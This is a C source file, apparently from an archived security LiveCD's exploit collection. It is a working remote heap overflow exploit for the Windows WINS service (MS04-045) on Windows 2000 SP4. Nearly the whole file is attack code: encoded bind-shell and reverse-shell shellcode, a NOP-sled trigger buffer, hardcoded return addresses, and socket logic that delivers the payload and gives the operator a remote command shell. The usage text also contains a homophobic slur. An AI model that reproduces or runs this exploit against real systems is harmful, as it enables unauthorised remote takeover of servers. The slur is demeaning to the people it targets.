home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / ms04045.cpp

< prev

next >

Wrap

C/C++ Source or Header  |  2005-04-05  |  11KB  |  292 lines

---

1. /*
2. Windows Internet Name Service (WINS) Remote Heap Buffer Overflow
3. ------------------------------------
4. ------------------------------------
5.  
6. Advisory credits:
7. ----------------
8.  
9. Nicolas Waisman of Immunity Inc. (www.immunitysec.com)
10.  
11. Advisory link:
12. ----------------
13.  
14. immunitysec.com/downloads/instantanea.pdf
15.  
16. Fix:
17. ----------------
18.  
19. support.microsoft.com/kb/870763 (MS04-045)
20.  
21. Exploit method:
22. ----------------
23.  
24. PEB (RtlEnterCriticalSection)
25.  
26. Tested Working:
27. ----------------
28.  
29. Win2k SP4 Server ENGLISH (should be all langages, not sure)
30. Win2k SP4 Advanced Server ENGLISH (should be all langages, not sure)
31. (KB870763 removed!)
32.  
33. Note:
34. ----------------
35.  
36. A HAT-SQUAD view on this hole; exploitable and remaining critic for Windows 2000.
37. May need update for Windows 2003 due to the different
38. structure of wins.exe in it but the bug remain exploitable
39. with no KB870763 of course....
40. If you look closely at my code , you will notice two overwrites,
41. this is the difference between Server <=> Advanced Server, with an
42. el8 pad, repair, you catch them both.
43.  
44. Greetings:
45. ----------------
46.  
47. All guys at hat-squad and metasploit
48. also #n3ws at EFnet, useful to keep an eye on security.. (50 rsslinks)
49. and thanx you leku.
50.  
51.  
52. -=[�class101.org]=-
53.  
54. */
55.  
56. #include <stdio.h>
57. #include <string.h>
58. #ifdef WIN32
59. #include "winsock2.h"
60. #pragma comment(lib, "ws2_32")
61. #else
62. #include <sys/socket.h>
63. #include <sys/types.h>
64. #include <netinet/in.h>
65. #include <netinet/in_systm.h>
66. #include <netinet/ip.h>
67. #include <netdb.h>
68. #include <arpa/inet.h>
69. #include <unistd.h>
70. #include <stdlib.h>
71. #include <fcntl.h>
72. #endif
73.  
74. char scode1[]=
75. "\x33\xC9\x83\xE9"
76. "\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
77. "\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
78. "\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
79. "\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
80. "\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
81. "\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
82. "\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
83. "\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
84. "\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
85. "\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
86. "\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
87. "\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
88. "\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
89. "\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
90. "\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
91. "\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
92. "\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
93. "\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
94. "\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
95. "\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
96. "\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
97. "\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
98.  
99.  
100. char scode2[]=
101. /*original vlad902's reverse shellcode from metasploit.com
102. NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
103. original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
104. "\xFC\x6A\xEB\x52" /*modded adjusting jump*/
105. "\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
106. "\x78\x01\xEF"
107. "\x83\xC7\x01" /*modded, adding 1 to edi*/
108. "\x8B\x4F\x17" /*modded, adjusting ecx*/
109. "\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
110. "\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
111. "\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
112. "\x8B\x5F\x23" /*modded, adjusting ebx*/
113. "\x01\xEB\x66\x8B\x0C\x4B"
114. "\x8B\x5F\x1B" /*modded, adjusting ebx*/
115. "\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
116. "\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
117. "\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
118. "\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
119. "\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
120. "\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
121. "\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
122. "\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
123. "\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
124. "\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
125. "\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
126. "\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
127. "\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
128. "\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";
129.  
130. char bug[]=
131. "\x00\x00\x07\xD0\x00\x00\xFF\x00\x05\x39\x1F\xBC\x90\x90\x90\x90"
132. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
133. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
134. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
135. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
136. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
137. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
138. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
139. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
140. "\x90\x90\x90\x90";
141.  
142. char payload[256],payload2[4096];
143. int tot;
144.  
145. char pad[]="\x00\x00\x00\x00",padB[]="\xEB\x07";
146. char ret1[]="\xFC\x20\x39\x05";
147. char ret1b[]="\x20\xF0\xFD\x7F";
148. char repair[]="\xC7\x40\x20\x60\x20\xF8\x77";
149. char sip[3],spo[1];
150.  
151. #ifdef WIN32
152. WSADATA wsadata;
153. #endif
154.  
155. void ver();
156. void usage(char* us);
157. void sl(int time);
158.  
159. int main(int argc,char *argv[])
160. {
161. ver();
162. int check1, check2;
163. unsigned long gip;
164. unsigned short gport;
165. char *what, *where, *os;
166. if (strlen(argv[2])<7||argc==5||argc>6||argc<3||atoi(argv[1])>1
167. ||atoi(argv[1])<1){usage(argv[0]);return -1;}
168. if (argc==6){if (strlen(argv[4])<7){usage(argv[0]);return -1;}}
169. #ifndef WIN32
170. if (argc==6)
171. {
172. gip=inet_addr(argv[4])^(long)0x00000000;
173. gport=htons(atoi(argv[5]))^(short)0x0000;
174. memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
175. check1=strlen(&sip[0]);check2=strlen(&spo[0]);
176. if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
177. printf("[+] error, the IP has a null byte in hex...\n");return -1;}
178. if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
179. }
180. #define Sleep sleep
181. #define SOCKET int
182. #define closesocket(s) close(s)
183. #else
184. if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
185. if (argc==6)
186. {
187. gip=inet_addr(argv[4])^(ULONG)0x00000000;
188. gport=htons(atoi(argv[5]))^(USHORT)0x0000;
189. memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
190. check1=strlen(&sip[0]);check2=strlen(&spo[0]);
191. if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
192. printf("[+] error, the IP has a null byte in hex...\n");return -1;}
193. if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
194. }
195. #endif
196. int ip=htonl(inet_addr(argv[2])), port;
197. if (argc==4||argc==6){port=atoi(argv[3]);} else port=42;
198. SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
199. s=socket(AF_INET,SOCK_STREAM,0);
200. if (s==-1){printf("[+] socket() error\n");return -1;}
201. if (atoi(argv[1]) == 1){what=ret1;where=ret1b;os=
202. "Win2k SP4 Server ENGLISH\n[+] Win2k SP4 Advanced Server ENGLISH\n";}
203. printf("[+] TARGET: %s\n",os);sl(1);
204. server.sin_family=AF_INET;
205. server.sin_addr.s_addr=htonl(ip);
206. server.sin_port=htons(port);
207. connect(s,( struct sockaddr *)&server,sizeof(server));
208. timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
209. switch(select(s+1,NULL,&mask,NULL,&timeout))
210. {
211. case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
212. case 0: {printf("[+] connection failed\n");closesocket(s);return -1;}
213. default:
214. if(FD_ISSET(s,&mask))
215. {
216. printf("[+] connected\n");sl(1);
217. printf("[+] building the payload..\n");sl(1);
218. memset(payload,0x90,196);memcpy(payload+132,what,4);memcpy(payload+136,where,4);
219. memcpy(&bug[84], what, 4);memcpy(&bug[88], where, 4);
220. memset(payload2,0x90,2100);
221. memcpy(payload2+252,padB,2);memcpy(payload2+52,padB,2);
222. memcpy(payload2+263,repair,7);memcpy(payload2+63,repair,7);
223. if (argc==6)
224. {
225. memcpy(&scode2[167], &gip, 4);
226. memcpy(&scode2[173], &gport, 2);
227. memcpy(payload2+350,scode2,strlen(scode2));
228. }
229. else memcpy(payload2+350,scode1,strlen(scode1));
230. printf("[+] sh0uting the heap!\n");sl(1);
231. if (send(s,bug,sizeof(bug)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
232. if (send(s,pad,sizeof(pad)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
233. if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
234. if (send(s,pad,sizeof(pad)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
235. if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
236. sl(3);
237. tot=sizeof(bug)-1+(sizeof(pad)*2)-2+strlen(payload)+strlen(payload2);
238. printf("[+]\n[+] payload size: %d\n",tot);sl(1);
239. if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
240. else printf("[+] payload sent, use telnet %s:101 to get a shell\n",inet_ntoa(server.sin_addr));
241. return 0;
242. }
243. }
244. closesocket(s);
245. #ifdef WIN32
246. WSACleanup();
247. #endif
248. return 0;
249. }
250.  
251.  
252. void usage(char* us)
253. {
254. printf(" \n");
255. printf(" [+] . 101_WINS.exe Target VulnIP (bind mode) \n");
256. printf(" [+] . 101_WINS.exe Target VulnIP VulnPORT (bind mode) \n");
257. printf(" [+] . 101_WINS.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
258. printf("TARGETS: \n");
259. printf(" [+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
260. printf(" [+] 1. Win2k SP4 Advanced Server English (*) - v5.0.2195 \n");
261. printf("NOTE: \n");
262. printf(" The exploit bind a cmdshell port 101 or \n");
263. printf(" reverse a cmdshell on your listener. \n");
264. printf(" A wildcard (*) mean tested working, else, supposed working. \n");
265. printf(" A symbol (-) mean all. \n");
266. printf(" Compilation msvc6, cygwin, Linux. \n");
267. printf(" \n");
268. return;
269. }
270.  
271. void ver()
272. {
273. printf(" \n");
274. printf(" ===================================================[v0.1]====\n");
275. printf(" ============Windows Internet Name Service (WINS)=============\n");
276. printf(" ============Remote Heap Buffer Overflow Exploit==============\n");
277. printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
278. printf(" =============================================================\n");
279. printf(" \n");
280. }
281.  
282. void sl(int time)
283. {
284. #ifdef WIN32
285. Sleep(time*1000);
286. #else
287. Sleep(time);
288. #endif
289. }
290.  
291.  
292.